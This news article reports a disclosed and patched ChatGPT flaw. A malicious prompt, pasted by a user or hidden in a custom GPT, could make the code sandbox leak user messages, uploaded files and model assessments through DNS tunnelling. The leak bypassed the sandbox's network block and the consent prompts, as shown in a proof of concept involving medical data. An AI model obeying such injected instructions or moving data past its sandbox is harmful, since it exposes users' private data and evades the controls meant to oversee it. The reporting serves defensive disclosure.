ChatGPT flaw let hackers steal data via DNS queries

Security researchers have disclosed a vulnerability in ChatGPT that could have allowed sensitive user data to be exfiltrated through DNS queries. OpenAI said it had already identified the underlying issue and deployed a fix.

The flaw involved ChatGPT's code execution and data analysis runtime, which is designed to block direct outbound internet access. Researchers said they found a hidden outbound route that a single malicious prompt could trigger, allowing summaries of user messages, uploaded files and model-generated assessments to be sent to an external server without visible warning or user approval.

According to the technical details, the attack relied on DNS tunnelling. Although normal outbound network requests from the isolated Linux container were blocked, DNS resolution remained available, creating a narrow communications path that could carry encoded data to attacker-controlled infrastructure.

That meant information could leave the environment even though ChatGPT presented outbound data sharing as restricted and subject to user-facing controls. The same route could also be used to send instructions back into the container, creating remote shell access inside the code execution runtime.

How It Worked

The reported attack began with a malicious prompt inserted into an otherwise ordinary conversation. From that point, each subsequent exchange could become a source of leakage, depending on how the prompt directed the model to process the material.

The leaked data could include raw text supplied by the user, information extracted from uploaded documents or conclusions generated by the system itself. Researchers argued that this increased the attack's value because it could target both source material and the condensed outputs derived from it.

One scenario described a malicious prompt disguised as a productivity aid. Another involved prompts framed as a way to unlock premium features on lower-tier accounts, giving attackers a social engineering hook to persuade users to paste long or unusual instructions into a chat.

The risk was broader in custom GPTs, where the same logic could be embedded in the assistant's instructions or files. In that case, a user would only need to open the GPT and interact with it normally while the hidden mechanism extracted selected information in the background.

The researchers illustrated that point with a proof of concept in which a GPT acted as a personal doctor. In that test, they said a user uploaded lab results containing identifying details, asked for help interpreting the document and received a medical assessment in what appeared to be an ordinary exchange. At the same time, the attacker's server allegedly received the patient's identity and the model's assessment.

Industry Response

David Brauchler, technical director and head of AI and ML security at NCC Group, said the case reflected an older class of security problem reappearing in AI systems.

"This attack uses DNS side-channels, a long-standing element of threat actor tradecraft. Vulnerabilities that leak information or compromise functionality through DNS are abundant in web applications, demonstrating that traditional application vulnerabilities remain relevant in the AI space and, in fact, become amplified when chained with AI features. The threat landscape is evolving to include combinations of both application flaws and data-oriented risks that the industry has not had to contend with before."

"OpenAI is patching this vulnerability, but organisations should ensure they continue regular security testing of their own AI-powered applications, because most AI environments inadvertently introduce dozens of vulnerabilities just like this one, with a much lower barrier to exploitation. Without ongoing security assessments, these flaws will lurk just below the surface of production applications, as our NCC Group AI Red Team has commonly observed," Brauchler said.

Broader Questions

The incident highlights how AI assistants have moved beyond text generation into environments that can run code, inspect files and connect with external services while handling medical, financial and legal information. Those features create more potential paths for sensitive data to cross system boundaries.

In normal use, ChatGPT's external actions are designed to show users when information is about to be sent to third-party services and to ask for approval. Researchers said the DNS channel sat outside that model, meaning the system did not treat the activity as an external transfer requiring consent or resistance.

They also argued that the issue showed how legacy internet mechanisms, such as DNS, can become weak points in newer AI environments. A platform may block conventional network access while still exposing enough infrastructure for data to be encoded, transmitted and reconstructed elsewhere.

For corporate users, the case is likely to sharpen scrutiny of AI tools that process internal documents or customer records. Many businesses are building assistants that review contracts, support service teams, or analyse uploaded files, and security specialists have repeatedly warned that these workflows require the same testing discipline as conventional web applications.

Brauchler urged organisations to keep testing their own systems because "most AI environments inadvertently introduce dozens of vulnerabilities just like this one, with a much lower barrier to exploitation."